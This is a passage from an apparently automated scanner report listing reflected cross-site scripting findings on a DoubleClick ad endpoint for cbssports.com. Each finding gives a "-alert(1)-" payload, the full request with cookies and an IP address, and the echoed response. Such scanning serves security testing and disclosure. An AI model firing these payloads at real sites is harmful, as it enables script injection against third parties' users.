...[SNIP]...
0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US1f38f"-alert(1)-"85e64b01986&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0
...[SNIP]...

3.36. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8ec7"-alert(1)-"ec811ea4808 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431f8ec7"-alert(1)-"ec811ea4808&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431f8ec7"-alert(1)-"ec811ea4808&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.2
...[SNIP]...

3.37. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89d47"-alert(1)-"6396b7e7268 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a89d47"-alert(1)-"6396b7e7268&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a89d47"-alert(1)-"6396b7e7268&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.1
...[SNIP]...

3.38. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b749"-alert(1)-"284c75e823e was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=4b749"-alert(1)-"284c75e823e&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
log.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=4b749"-alert(1)-"284c75e823e&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl
...[SNIP]...

3.39. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e34b9"-alert(1)-"c75c4a6b53f was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.come34b9"-alert(1)-"c75c4a6b53f&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.come34b9"-alert(1)-"c75c4a6b53f&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");

...[SNIP]...

3.40. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbafa"-alert(1)-"4555ba63b5f was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2cbafa"-alert(1)-"4555ba63b5f&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2cbafa"-alert(1)-"4555ba63b5f&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.24
...[SNIP]...

3.41. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329f1"-alert(1)-"4602bfcd0de was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com329f1"-alert(1)-"4602bfcd0de&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
72%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com329f1"-alert(1)-"4602bfcd0de&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

3.42. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f20"-alert(1)-"5e0c335e6a0 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M12f20"-alert(1)-"5e0c335e6a0&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M12f20"-alert(1)-"5e0c335e6a0&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.43. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c9ce"-alert(1)-"2ecdc88be42 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=3c9ce"-alert(1)-"2ecdc88be42&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=3c9ce"-alert(1)-"2ecdc88be42&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.
...[SNIP]...

3.44. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77531"-alert(1)-"44f2f7f79cf was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=10077531"-alert(1)-"44f2f7f79cf&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=10077531"-alert(1)-"44f2f7f79cf&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/
...[SNIP]...

3.45. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fa1d"-alert(1)-"0003816d0c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=9fa1d"-alert(1)-"0003816d0c&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
